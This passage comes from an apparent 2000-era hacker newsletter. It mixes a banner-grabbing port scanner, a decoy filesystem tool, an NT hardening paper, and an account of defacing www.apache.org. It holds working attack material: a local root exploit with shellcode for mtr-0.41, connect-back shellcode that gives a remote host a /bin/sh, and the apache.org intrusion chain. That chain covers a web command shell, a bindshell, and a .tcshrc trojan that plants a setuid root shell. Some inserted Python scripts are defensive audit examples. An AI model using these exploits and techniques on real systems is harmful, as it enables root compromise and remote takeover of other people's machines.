%s\n",ip,buf); // log popper connect } imap=ncon(s3,ip,143,tout); if(imap==-9) return; // host timed out else if(imap>=0) { bzero(buf,sizeof(buf)); read(s3,buf,sizeof(buf)); // get imap version fprintf(f3,"%s %s\n",ip,buf); // log imap connect } bind=ncon(s1,ip,53,tout); tout -= 2; // wait 2 seconds less if(bind==-9) return; // host timed out else if(bind>=0) // log dns connect fprintf(f1,"%s\n",ip); ftp=ncon(s5,ip,21,tout); if(ftp==-9) return; // host timed out else if(ftp>=0) { bzero(buf,sizeof(buf)); read(s5,buf,sizeof(buf)); // get ftp version fprintf(f5,"%s %s\n",ip,buf); // log ftp connect } fclose(f1); fclose(f2); fclose(f3); fclose(f4); fclose(f5); raise(9); return; } int ncon(int tsock, char *ip, int port, int timeout) { int probe; struct sockaddr_in target; target.sin_family = AF_INET; target.sin_port = htons(port); target.sin_addr.s_addr = inet_addr(ip); bzero(&target.sin_zero,8); alarm(0); signal(SIGALRM,timedout); alarm(timeout); probe = connect(tsock, (struct sockaddr *)&target, SSA); alarm(0); if(probe < 0) { close(tsock); if(errno == EINTR) return -9; if(errno == ETIMEDOUT) return -9; } return probe; } void usage(char *name,char *text) { printf("usage: %s %s\n",name,text); exit(EXIT_FAILURE); } int validip(char *ip) { int a,b,c,d,*x; sscanf(ip,"%d.%d.%d.%d",&a,&b,&c,&d); x=&a; if(*x < 0) return 0; if(*x > 255) return 0; x=&b; if(*x < 0) return 0; if(*x > 255) return 0; x=&c; if(*x < 0) return 0; if(*x > 255) return 0; x=&d; if(*x < 0) return 0; if(*x > 255) return 0; sprintf(ip,"%d.%d.%d.%d",a,b,c,d); // truncate possible garbage data return 1; } void fchk(FILE *fp) { if(fp==NULL) { fprintf(stderr,"Error opening file or socket.\n"); exit(EXIT_FAILURE); } return; } void timedout(int sig) { alarm(0); raise(9); } int background() { int pid; signal(SIGCHLD,SIG_IGN); pid = fork(); if(pid<0) return -1; // fork failed if(pid>0) { sleep(1); exit(EXIT_SUCCESS); // parent, exit } if(pid==0) { signal(SIGCHLD,SIG_DFL); return getpid(); // child, go on } return 
  -2;                                   // shouldnt happen
}

@HWA

27.0 [b0f] Pseudo Cryptographic Filesystem..
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     .. Creates a fake CFS directory that is indistinguishable from real ones

/*
 * pcfs - pseudo cryptographic file system
 * (c) 2000 by Mixter
 *
 * This tool just creates a recursive directory and file structure
 * that contains purely random data, but is indistinguishable from an
 * encrypted CFS directory, unless an extensive cryptanalysis is performed.
 * This can be taken as a proof that a strange directory cannot easily be
 * proven to actually contain encrypted data. May be useful against f3dz,
 * just for decoy purposes, or to keep people from analyzing your
 * cryptographic file systems structure. Distributed according to the GPL.
 *
 * WARNING: THIS PROGRAM IS SUBJECT TO PSEUDO-CRYPTOGRAPHIC EXPORT
 * CONTROLS AND US-RESTRICTIONS AGAINST RANDOM DATA! =P
 * This code was reviewed and approved by the SCC (sloppy code commission)
 * gcc -Wall -O2 pcfs.c -o pcfs
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/resource.h>

#define START_PATH "fake"

mode_t modes[7] = {00755, 00644, 0000, 00664, 00700, 00777, 00444};
char chr[16] = "abcdef1234567890", rseed[65535], buffer[256];
char wd[200];
int rcounter = 0;

void random_init (void);
inline long gr (int, int);
char *rname (void);
mode_t rmode (void);
void mkfiles (void);
void mkd (char *, int);

int
main (void)
{
  printf ("Creating fake file system in %s/%s, press a key\n",
          getcwd (wd, 200), START_PATH);
  (void) getchar ();
  printf ("Hit CTRL+C to stop - creating files");
  if (!geteuid ())
    setpriority (PRIO_PROCESS, 0, -10);
  mkd (START_PATH, 0);
  return 0;
}

void
mkd (char *dirname, int forking)
{
  printf (".");
  fflush (stdout);
  if (forking)
    if (fork ())
      return;
  mkdir (dirname, rmode ());
  getcwd (wd, 200);
  strcat (wd, "/");
  strcat (wd, dirname);
  chdir (wd);
  if (forking)
    mkfiles ();
  else
    {
      char smbuf[32];
      int a, f = open ("/dev/urandom", O_RDONLY);
      read (f, smbuf, 32);
      a = open ("...", O_WRONLY |
                O_CREAT | O_TRUNC, 00644);      /* hash */
      write (a, smbuf, gr (5, 10));
      close (a);
      sprintf (smbuf, "%ld", gr (1, 5));
      a = open ("..c", O_WRONLY | O_CREAT | O_TRUNC, 00644);    /* algorithm */
      write (a, smbuf, strlen(smbuf));
      close (a);
      read (f, smbuf, 32);
      a = open ("..k", O_WRONLY | O_CREAT | O_TRUNC, 00644);    /* encrypted key */
      write (a, smbuf, 32);
      close (a);
      close (f);
      sprintf (smbuf, "%ld", gr (1000, 900000));
      a = open ("..s", O_WRONLY | O_CREAT | O_TRUNC, 00644);    /* session blah */
      write (a, smbuf, strlen(smbuf));
      close (a);
      while (1)
        mkfiles ();
    }
}

void
mkfiles (void)
{
  while (gr (0, 25))
    if (!gr (0, 10))
      mkd (rname (), 1);
    else
      {
        int f = open ("/dev/urandom", O_RDONLY), x, y = gr (0, 65500);
        char fname[256], fn2[256], big[65535];
        memset (fname, 0, 256);
        memset (fn2, 0, 256);
        sprintf (fname, "%s", rname ());
        sprintf (fn2, ".pvect_%s", rname ());
        symlink (fname, fn2);
        x = open (fname, O_RDWR | O_CREAT, rmode());
        read (f, big, y);
        write (x, big, y);
        close (f);
        close (x);
      }
}

char *
rname (void)
{
  int i;
  memset (buffer, 0, 256);
  for (i = 0; i < gr (5, 150); i++)
    buffer[i] = chr[gr (0, 15)];
  return buffer;
}

mode_t
rmode (void)
{
  return (modes[gr (0, 6)]);
}

void
random_init (void)
{
  int rfd = open ("/dev/urandom", O_RDONLY);
  if (rfd < 0)
    rfd = open ("/dev/random", O_RDONLY);
  rcounter = read (rfd, rseed, 65535);
  close (rfd);
}

inline long
gr (int min, int max)
{
  if (rcounter < 2)
    random_init ();
  /* step back first: rseed[rcounter] is one past the data after a full read */
  rcounter -= 2;
  /* random() is seeded by srandom(); srand() only works where the two share state */
  srandom (rseed[rcounter + 1] + (rseed[rcounter] << 8));
  return ((random () % (int) (((max) + 1) - (min))) + (min));
}

@HWA

28.0 [b0f] mtr-0.41 (freebsd) local root exploit
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* mtr-0.41 (freebsd) local root exploit */
/* (c) 2000 babcia padlina / buffer0verfl0w security (www.b0f.com) */

#include
#include
#include
#include

#define NOP 0x90
#define BUFSIZE 10000
#define ADDRS 1200

long getesp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(argc, argv)
int argc;
char **argv;
{
        char *execshell =
        //seteuid(0);
        "\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
        //setuid(0);
        "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
        //execl("/bin/sh", "sh", 0);
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        char buf[BUFSIZE+ADDRS+1], *p;
        int noplen, i, ofs;
        long ret, *ap;

        if (argc < 2)
        {
                fprintf(stderr, "usage: %s ofs\nusually offset = 4000\n", argv[0]);
                exit(0);
        }

        ofs = atoi(argv[1]);

        noplen = BUFSIZE - strlen(execshell);
        ret = getesp() + ofs;

        memset(buf, NOP, noplen);
        buf[noplen+1] = '\0';
        strcat(buf, execshell);

        setenv("EGG", buf, 1);

        p = buf;
        ap = (unsigned long *)p;

        for(i = 0; i < ADDRS / 4; i++)
                *ap++ = ret;

        p = (char *)ap;
        *p = '\0';

        fprintf(stderr, "ret: 0x%x\n", ret);

        setenv("TERMCAP", buf, 1);
        execl("/usr/local/sbin/mtr", "mtr", 0);

        return 0;
}

@HWA

29.0 [b0f] shellcode that connects to a host&port and starts a shell
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
Connecting shellcode written by lamagra
lamagra is a member of b0f/buffer0verfl0w security
http://lamagra.seKure.de - http://www.b0f.com

file "connect"
version "01.01"
text
.align 4
_start:
#socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
movl %esp,%ebp
xorl %edx,%edx
movb $102,%edx
movl %edx,%eax              # 102 = socketcall
xorl %ecx,%ecx
movl %ecx,%ebx
incl %ebx                   # socket()
movl %ebx, -8(%ebp)         # 1 = SOCK_STREAM
incl %ebx
movl %ebx, -12(%ebp)        # 2 = AF_INET
decl %ebx                   # 1 = SYS_socket
movl %ecx, -4(%ebp)         # 0 = IPPROTO_IP
leal -12(%ebp),%ecx         # put args in correct place
int $0x80                   # switch to kernel-mode
xorl %ecx,%ecx
movl %eax,-12(%ebp)         # save the fd

# connect(fd,(struct sockaddr *)&struct,16);
incl %ebx
movw %ebx,-20(%ebp)         # 2 = PF_INET
movw $9999,-18(%ebp)        # 9999 = htons(3879);
movl $0x100007f,-16(%ebp)   # htonl(IP)
leal -20(%ebp),%eax         # struct sockaddr
movl
%eax,-8(%ebp)               # load the struct
movb $16,-4(%ebp)           # 16 = sizeof(sockaddr)
movl %edx,%eax              # 102 = socketcall
incl %ebx                   # 3 = SYS_connect
leal -12(%ebp),%ecx         # put args in place
int $0x80                   # call socketcall()

# dup2(fd,0)
xorl %ecx,%ecx
movb $63,%edx               # 63 = dup2()
movl %edx,%eax
int $0x80

#dup2(fd,1)
movl %edx,%eax
incl %ecx
int $0x80

# arg[0] = "/bin/sh"
# arg[1] = 0x0
# execve(arg[0],arg);
jmp 0x18
popl %esi
movl %esi,0x8(%ebp)
xorl %eax,%eax
movb %eax,0x7(%esi)
movl %eax,0xc(%ebp)
movb $0xb,%al
movl %esi,%ebx
leal 0x8(%ebp),%ecx
leal 0xc(%ebp),%edx
int $0x80
call -0x1d
.string "/bin/sh"
*/

char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee"
"\x0f\x27"              // <-- port to connect to
"\xc7\x45\xf0"
"\x7f\x00\x00\x01"      // <-- host to connect to
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0"
"\x43\x8d\x4d\xf4\xcd\x80\x31\xc9\xb2\x3f\x89\xd0\xcd\x80\x89\xd0"
"\x41\xcd\x80\xeb\x18\x5e\x89\x75\x08\x31\xc0\x88\x46\x07\x89\x45"
"\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xe8\xe3\xff"
"\xff\xff/bin/sh";

#define NAME "connecting"

main()
{
  int (*funct)();
  funct = (int (*)()) code;
  printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code));
  (int)(*funct)();
}

@HWA

30.0 [b0f] NT Security check paper part 2 by Slash
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

For buffer0verfl0w security
written by slash
tcsh@b0f.i-p.com
http://www.b0f.com

Windows NT Security Check Part II
=================================

Introduction
------------

In Part I of "Windows NT security Check" I explained some basic things about User accounts and Logging options. In this part I'll try to explain various Groups and User rights. Please note that any of the topics provided in these articles can be discussed on our webboard located at http://net-security.org/webboard.htm

Groups
------

The membership of groups should be carefully evaluated.
A group that is granted permissions to sensitive files might contain users that should not have that access. Open each group listed in the User Manager and inspect its members.

- Carefully evaluate the members of management groups such as Administrators, Server Operators, Account Operators, Backup Operators, and Print Operators. Remove all unnecessary accounts.

- Make sure that all administrative users have two accounts: one for administrative tasks and one for regular use. Administrators should only use their administrative accounts when absolutely necessary.

- Evaluate each global group membership and the resources that the group has access to. Does the group have access in other domains?

- What folders and files do groups have permission to access?

- Do local groups hold global groups from other domains? Check the membership of these global groups and make sure that no users have unnecessary access to resources in the current domain.

The Administrator Account and Administrators Group
--------------------------------------------------

The Administrator account and Administrators group have unlimited rights on the system. Therefore, you need to carefully evaluate the membership of the Administrators group and take care of some other housekeeping related to the Administrator account:

- If you are taking over the management of an existing system, you should change the Administrator account name and password immediately. You do not know who might have a password that would give them access to the account.

- The Administrator account is often the target of attacks because of its well-known name. You should rename the Administrator account to an obscure name and create a "decoy" account called "Administrator" with no permissions. Intruders will attempt to break in to this decoy account instead of the real account.

- Enable failed logons in the auditing system to detect attempts to log on to any account, including Administrator.
- Look for unnecessary accounts that have Administrator status. Perhaps an intruder has created such an account as a backdoor into the system.

The Administrators group has the "Access this computer from network" right, which you can block to prevent account hijacking or unauthorized activities. Without this right, administrators must log on at the computer itself in a controlled environment to do any administrative tasks. You will also need to remove the right from the Everyone group, then add back in the accounts that are allowed to log on from the network.

The Guest Account and Everyone Group
------------------------------------

Most administrators agree that the Guest account should be disabled, although removing it removes the ability of anonymous users to access a system. If you decide to enable the Guest account, consider creating a separate domain for these public services where the Guest account is enabled. Alternatively, use a Web server for this type of system.

- Users who log on as guests can access any shared folder that the Everyone group has access to (i.e., if the Everyone group has Read permissions to the Private folder, guests can access it with Read permissions).

- You don't know who Guest users are and there is no accountability because all guests log in to the same account.

- If you have Microsoft Internet Information Server software installed, a special Guest account called IUSR_computername exists with the rights to log on locally. Remove this account if you don't want the general public to access your Web server. Users must then have an account to access the Web server.

User rights
-----------

In the User Manager for Domains, check the rights that users and groups have on the system. Choose User Rights from the Policies menu to display the User Rights Policy dialog box. Initially, the box shows the basic rights. To evaluate all rights, click the Show Advanced User Rights option.
Here are some considerations for basic rights:

- Access this computer from the network
  By default, only the Administrators and the Everyone group have this right. Remove the Everyone group (why would you want everyone to access this server from the network if you are interested in security?), then add specific groups as appropriate. For example, create a new group called "Network Users" with this right, then add users who should have network access.

- Backup files and directories
  Users with this right can potentially carry any files off-site. Carefully evaluate which users and groups have this right. Also evaluate the Restore files and directories right.

- Log on locally
  For servers, only administrators should have this right. No regular user ever needs to log on directly to the server itself. By default, the administrative groups (Administrators, Server Manager, etc.) have this right. Make sure that any user who is a member of these groups has a separate management account.

- Manage auditing and security logs
  Only the Administrators group should have this right.

- Take ownership of files or other objects
  Only the Administrators group should have this right.

Scan all the advanced rights to make sure that a user has not been granted rights inappropriately.

Files, Folders, Permissions and Shares
--------------------------------------

This discussion assumes that you are only using NTFS volumes on your servers. Do not use FAT volumes in secure installations. To check permissions on folders and other resources, you must go to each resource individually to review which users and groups have permissions. This can be a bewildering task, so for large systems obtain a copy of the Somarsoft DumpACL utility.

To open the Permissions dialog box for a folder or file, right-click it and choose Properties, then click either the Sharing or the Security tab. The Sharing options show who has access to the folder over the network.
The Security tab has the Permission and Auditing buttons so you can check local permissions or set auditing options.

Start your evaluation with the most sensitive and critical folders if you are doing this procedure manually or performing a periodic checkup. Take care to do the following:

- Check each folder and/or file to determine which local users and groups have access and whether that access is appropriate.

- Check all shared folders and the share permissions on those folders to determine which network users and groups have access and whether that access is appropriate.

- Program files and data files should be kept in separate folders to make management and permission setting easier. Also, if users can copy files into a data folder, remove the Execute permission on the folder to prevent someone from copying and executing a virus or Trojan Horse program.

- Separate public files from private files so you can apply different permission sets.

- If users or groups have access to a folder, should they have the same access to every file in the folder? To every subdirectory? Check the sensitivity of files and attached subdirectories to evaluate whether inherited permissions are appropriate.

- Keep in mind that the Everyone group gets Full access by default for all new folders you create. To prevent this, change the Everyone group's permission for a folder, then any new subdirectories you create will get the new permission settings.

- If the server is connected to an untrusted network such as the Internet, do not store any files on the server that are sensitive and for in-house access only.

- Never share the root directory of a drive or one of the drive icons that appears in the graphical display. An exception would be sharing a Read Only CD-ROM drive for public access.

- For sensitive, password protected directories, enable Auditing.
  Right-click a folder, click Security, then click Auditing and enable Failure to track users that are attempting unauthorized access to a folder or file. Note that File and Object access must be enabled from the Audit Policies menu in the User Manager, as described later.

- Use encryption wherever possible to hide and protect files. Mergent (http://www.mergent.com/) and RSA Data Systems (http://www.rsa.com/) provide encryption software for this purpose.

You can remove Everyone's access to an entire folder tree by going to the root of the drive, changing the permissions, and propagating those permissions to subdirectories. Do not do this for the systemroot folder (usually C:\WINNT). You must manually update Everyone's right there.

Virus and Trojan Horse Controls
-------------------------------

Viruses are a particularly serious problem in the network environment because the client computer can become infected, transferring the virus to server systems. Other users may come into contact with infected files at the server. Evaluate and set the following options:

- Program directories should have permissions set to Read and Execute (not Write) to prevent a virus from being written into a directory where it can be executed. To install programs, temporarily set Write on, then remove it.

- Install new software on a separate, quarantined system for a test period, then install the software on working systems once you have determined that it is safe to run.

- Public file sharing directories should have the least permissions possible, i.e., Read Only, to prevent virus infections.

- If a user needs to put files on your server, create a "drop box" directory that has only the Write permission. Check all new files placed in this directory with a virus scanner. Implement backup policies and other protective measures.

- Educate and train users.

- Check the Symantec () site for interesting papers on Windows NT-specific virus issues.
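
The folder-permission rules from the "Files, Folders, Permissions and Shares" and "Virus and Trojan Horse Controls" sections, applied to a permission inventory. This is an added example, not part of Slash's paper: the pipe-separated inventory format, the folder roles and the sample rows are constructed for illustration, and the permission letters are NT's individual permissions (R, W, X, D, P, O).

```python
"""Check a folder-permission inventory against the paper's folder rules.

Assumed input (a constructed format, not the output of any real tool):
    folder | role | principal | permissions
role is one of program, data, public, dropbox; permissions use NT's
individual permission letters R W X D P O.
"""

FULL = set("RWXDPO")
ADMINS = {"Administrators"}     # assumption: only this group is exempt
MODIFY = set("WDPO")            # letters that let a principal alter content

# Constructed sample inventory.
SAMPLE = r"""
# folder | role | principal | permissions
D:\Apps      | program | Administrators | RWXDPO
D:\Apps      | program | Users          | RX
D:\Apps\Tool | program | Everyone       | RWXDPO
D:\Data      | data    | Staff          | RWXD
D:\Public    | public  | Everyone       | RX
D:\Public    | public  | Guests         | RWX
D:\Incoming  | dropbox | Everyone       | W
D:\Incoming  | dropbox | Staff          | RW
"""


def parse_inventory(text):
    """Return a list of (folder, role, principal, permission-set) tuples."""
    rows = []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != 4:
            raise ValueError(f"line {n}: expected 4 fields, got {len(parts)}")
        folder, role, principal, perms = parts
        perms = set(perms.upper())
        if not perms <= FULL:
            raise ValueError(f"line {n}: unknown letters {sorted(perms - FULL)}")
        rows.append((folder, role.lower(), principal, perms))
    return rows


def check(rows):
    """Return sorted (folder, principal, rule) findings for non-admin entries."""
    findings = set()
    for folder, role, principal, perms in rows:
        if principal in ADMINS or not perms:    # empty set = No Access
            continue
        # Everyone gets Full access by default on newly created folders.
        if principal == "Everyone" and perms == FULL:
            findings.add((folder, principal, "everyone-full-control"))
        # Program directories: Read and Execute, never Write.
        if role == "program" and perms & MODIFY:
            findings.add((folder, principal, "program-dir-writable"))
        # Data folders users can copy into must not also be executable.
        elif role == "data" and {"W", "X"} <= perms:
            findings.add((folder, principal, "data-dir-write-and-execute"))
        # Public shares: Read Only.
        elif role == "public" and perms & MODIFY:
            findings.add((folder, principal, "public-dir-not-read-only"))
        # Drop box: only the Write permission.
        elif role == "dropbox" and perms != {"W"}:
            findings.add((folder, principal, "dropbox-not-write-only"))
    return sorted(findings)


if __name__ == "__main__":
    for folder, principal, rule in check(parse_inventory(SAMPLE)):
        print(f"{rule:28} {principal:10} {folder}")
```
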

Auditing and Event Logs
-----------------------

Check the status of audit settings by choosing Audit on the Policies menu in the User Manager for Domains. The Audit Policy dialog box appears. The settings in this box reflect the minimum settings that are appropriate for auditing in most environments. Keep in mind that auditing too many events can affect a system's performance.

Protect auditing and security logs from other administrators who might change or delete them. You can grant only the Administrators group the ability to access the logs. To restrict access to only one user (the "auditor"), remove all users except the auditor from the Administrators group. This means all of your other administrators should be members of a management group that does not have the "Manage auditing and security log" right.

Check for failed logons in the Event Viewer. You can enable security auditing for logon attempts, file and object access, use of user rights, account management, security policy changes, restart and shutdown, and process tracking.

Backup
------

Backup policies and procedures are essential. In your evaluation, determine which users belong to the Backup Operators group. Carefully evaluate if you trust these users. Backup operators have the ability to access all areas of the system to back up and restore files.

Members of the Backup Operators group should have special logon accounts (not regular user accounts) on which you can set logon restrictions. If Joe is the backup operator, he should have a regular logon account for his personal activities and a special logon account for backing up the system. Set restrictions on the backup account, then set restrictions that force Joe to log on from a specific system only during appropriate hours. Change, with frequency, the name and password of the account to guard against hijacking.

- Review the backup policies. Is the backup schedule appropriate? Are files safely transported to secure backup locations?
  How might backup compromise the confidentiality of files?

- View the Event Log to audit backup activities.

Final conclusion
----------------

Well, I hope that these articles gave you some basic info on how to administer your Windows NT server. For more info I recommend reading the following books:

- Inside Windows NT Server 4 : Administrators Resource Edition

  This national bestseller has been updated and expanded to cover the most talked-about Windows NT-related technologies and the latest information on Windows NT Server 4. Aimed at network administrators, consultants, and IT professionals, this book provides invaluable information to help you get up and running. Written by experts, this comprehensive book takes you through the ins and outs of installing, managing, and supporting a Windows NT network - with efficiency. Loaded with tutorials and organized as a reference, it's the perfect resource for new administrators who need to get up to speed quickly, as well as technically savvy and experienced administrators who just need to locate the most essential information - without reading every page.

- Essential Windows NT System Administration

  Essential Windows NT System Administration helps you manage Windows NT systems as productively as possible, making the task as pleasant and satisfying as can be. It combines practical experience with technical expertise, helping you to work smarter and more efficiently. It covers not only the standard utilities offered with the Windows NT operating system, but also those from the Resource Kit, as well as important commercial and free third-party tools. It also pays particular attention to developing your own tools by writing scripts in Perl and other languages to automate common tasks. This book covers the workstation and server versions of Windows NT 4 on both Intel and Alpha processor-based systems.

- Microsoft Windows NT 4.0 Security, Audit, and Control

  This "Security Handbook" is the official guide to enterprise-level security on networks running Microsoft Windows NT Server 4.0. Written in collaboration between Microsoft and MIS professionals at Coopers & Lybrand, here is the essential reference for any Windows NT Server 4.0-based network.

This is only a small number of the books concerning Windows NT security and administration. You can find more books on Windows NT at our online bookstore.

Default newsletter (http://default.net-security.org)

@HWA

31.0 [IND] The apache.org hack. by {} and Hardbeat (Apr 4th 2000)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

How we defaced www.apache.org
by {} and Hardbeat

/*
 * Before you start reading
 */

This paper does _not_ uncover any new vulnerabilities. It points out common (and slightly less common) configuration errors, which even the people at apache.org made. This is a general warning. Learn from it. Fix your systems, so we won't have to :)

/*
 * introduction
 */

This paper describes how, over the course of a week, we succeeded in getting root access to the machine running www.apache.org, and changed the main page to show a 'Powered by Microsoft BackOffice' logo instead of the default 'Powered by Apache' logo (the feather). No other changes were made, except to prevent other (possibly malicious) people getting in.

Note that the problems described in this paper are not apache-related, these were all config errors (one of 'm straight from BugZilla's README, but the README had enough warnings so I don't blame the BugZilla developers). People running apache httpd do not need to start worrying because of anything uncovered herein.

We hacked www.apache.org because there are a lot of servers running apache software and if www.apache.org got compromised, somebody could backdoor the apache server source and end up having lots of owned boxes.
We just couldn't allow this to happen, we secured the main ftproot==wwwroot thing. While having owned root we just couldn't stand the urge to put that small logo on it.

/*
 * ftproot == wwwroot
 * o+w dirs
 */

While searching for the latest apache httpserver to diff it with the previous version and read that diff file for any options of new buffer overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of the http://www.apache.org on that ftp including world writable directories.

So we wrote a little wuh.php3 including and uploaded that to one of the world writable directories.

/*
 * Our commands executed
 */

Unsurprisingly, 'id' got executed when called like

    http://www.apache.org/thatdir/wuh.php3?cmd=id

Next was to upload some bindshell and compile it like calling

    http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c

and then executing it like calling

    http://www.apache.org/thatdir/wuh.php3?cmd=./httpd

/*
 * The shell
 */

Of course we used a bindshell that first requires ppl to authenticate with a hardcoded password (:

Now we telnet to port 65533 where we binded that shell and we have local nobody access, because cgi is running as user nobody.

/*
 * The apache.org box
 */

What did we find on apache.org box:

    -o=rx /root
    -o=rx homedirs

apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer overflow or some lame exploit, goal was to reach root with only configuration faults.

/*
 * Mysql
 */

After a long search we found out that mysql was running as user root and was reachable locally. Because apache.org was running bugzilla which requires a mysql account and has it username/password plaintext in the bugzilla source it was easy to get a username/passwd for the mysql database.

We downloaded nportredird and have it set up to accept connections on port 23306 from our ips and redir them to localhost port 3306 so we could use our own mysql clients.
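
A defender's check for the conditions described up to this point, as an added example that is not part of the original write-up: world-writable directories under a document root that FTP can also reach, and a database daemon running as root. The directory layout, the script-extension list and the sample `ps` output are assumptions constructed for illustration.

```python
import os
import stat
import tempfile

# Assumption: extensions this web server would hand to an interpreter.
SCRIPT_EXTS = {".php", ".php3", ".phtml", ".cgi", ".pl"}


def roots_overlap(ftp_root, web_root):
    """True if one tree equals or contains the other (symlinks resolved)."""
    a, b = os.path.realpath(ftp_root), os.path.realpath(web_root)
    return os.path.commonpath([a, b]) in (a, b)


def audit_web_root(web_root, ftp_root):
    """Return a set of (finding, path) tuples for the document root."""
    findings = set()
    if roots_overlap(ftp_root, web_root):
        findings.add(("ftproot-overlaps-wwwroot", os.path.realpath(web_root)))
    for dirpath, _dirs, files in os.walk(web_root):
        if not os.lstat(dirpath).st_mode & stat.S_IWOTH:
            continue
        # A sticky bit limits deletion, not creation: uploads still land here.
        findings.add(("world-writable-dir", dirpath))
        for name in files:
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
                findings.add(("script-in-writable-dir",
                              os.path.join(dirpath, name)))
    return findings


def daemons_as_root(ps_text, daemons=("mysqld",)):
    """Parse `ps -axo user,comm` output; return watched daemons owned by root."""
    hits = []
    for line in ps_text.splitlines()[1:]:           # skip the header row
        fields = line.split(None, 1)
        if len(fields) != 2:
            continue
        # basename() tolerates a ps that prints the full path
        user, comm = fields[0], os.path.basename(fields[1].strip())
        if user == "root" and comm in daemons:
            hits.append(comm)
    return hits


def build_sample_tree(base):
    """Constructed layout: a document root with one o+w upload directory."""
    root = os.path.join(base, "htdocs")
    incoming = os.path.join(root, "incoming")
    os.makedirs(os.path.join(root, "dist"))
    os.makedirs(incoming)
    os.chmod(root, 0o755)
    os.chmod(os.path.join(root, "dist"), 0o755)
    os.chmod(incoming, 0o777)                       # explicit: ignore umask
    with open(os.path.join(incoming, "upload.php3"), "w") as fh:
        fh.write("placeholder\n")
    return root


# Constructed sample of `ps -axo user,comm` output.
SAMPLE_PS = """USER     COMMAND
root     mysqld
nobody   httpd
root     sshd
"""


def demo():
    """Audit the constructed tree with FTP and web sharing one root."""
    with tempfile.TemporaryDirectory() as base:
        root = build_sample_tree(base)
        kinds = sorted(kind for kind, _ in audit_web_root(root, root))
    return kinds, daemons_as_root(SAMPLE_PS)


if __name__ == "__main__":
    print(demo())
```
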

/*
 * Full mysql access
 * use it to create files
 */

Having gained access to port 3306 coming from localhost, using the login 'bugs' (which had full access [as in "all Y's"]), our privs were elevated substantially. This was mostly due to sloppy reading of the BugZilla README which _does_ show a quick way to set things up (with all Y's) but also has lots of security warnings, including "don't run mysqld as root".

Using 'SELECT ... INTO OUTFILE;' we were now able to create files anywhere, as root. These files were mode 666, and we could not overwrite anything. Still, this seemed useful.

But what do you do with this ability? No use writing .rhosts files - no sane rshd will accept a world-writable .rhosts file. Besides, rshd wasn't running on this box.

/*
 * our /root/.tcshrc
 */

Therefore, we decided to perform a trojan-like trick. We used database 'test' and created a one-column table with a 80char textfield. A couple of inserts and one select later, we had ourselves a /root/.tcshrc with contents similar to:

    #!/bin/sh
    cp /bin/sh /tmp/.rootsh
    chmod 4755 /tmp/.rootsh
    rm -f /root/.tcshrc

/*
 * ROOT!!
 */

Quite trivial. Now the wait was for somebody to su -. Luckily, with 9 people legally having root, this didn't take long. The rest is trivial too - being root the deface was quickly done, but not until after a short report listing the vulnerabilities and quick fixes was built. Shortly after the deface, we sent this report to one of the admins.

/*
 * Fix that ftproot==wwwroot
 */

Another thing we did before the deface, was creating a file 'ftproot' in the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist' and changing the ftproot to this new 'ftproot' dir, yielding the world-writable dirs unexploitable but allowing ftp URLs to continue working.

/*
 * What could have been compromised?
 */

Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we wanted to, we could have done the same thing to Apache.
Edit the source and have people download trojaned versions. Scary, eh?

/*
 * In short:
 */

- ftproot==webroot, worldwritable dirs allowing us to upload and execute php3 scripts
- mysqld running as root, with a FULL RIGHTS login without a password.

/*
 * Compliments for the Apache admin team
 */

We would like to compliment the Apache admin team on their swift response when they found out about the deface, and also on their approach, even calling us 'white hats' (we were at the most 'grey hats' here, if you ask us).

Regards,
{} and Hardbeat.

{} (mailto:karin@root66.nl.eu.org) is part of
    RooT66      - http://root66.nl.eu.org
    ShellOracle - http://www.shelloracle.cjb.net
    b0f         - http://b0f.freebsd.lublin.pl

Hardbeat (petervd@vuurwerk.nl) just has a lame page at http://www.dataloss.net/

In the media:
~~~~~~~~~~~~

Wired;
http://www.wired.com/news/politics/0,1283,36170,00.html

Apache Site Defaced
by Michelle Finley

4:00 p.m. May. 5, 2000 PDT

While the rest of the world battled the "Love Bug" worm, free Web-server software-provider Apache had problems of its own.

Due to system-level misconfigurations of ftpd and bugzilla, a hacker was able to obtain a shell account and replace Apache's logo of a feather and its "Powered by Apache" tagline with a Microsoft logo and credit.

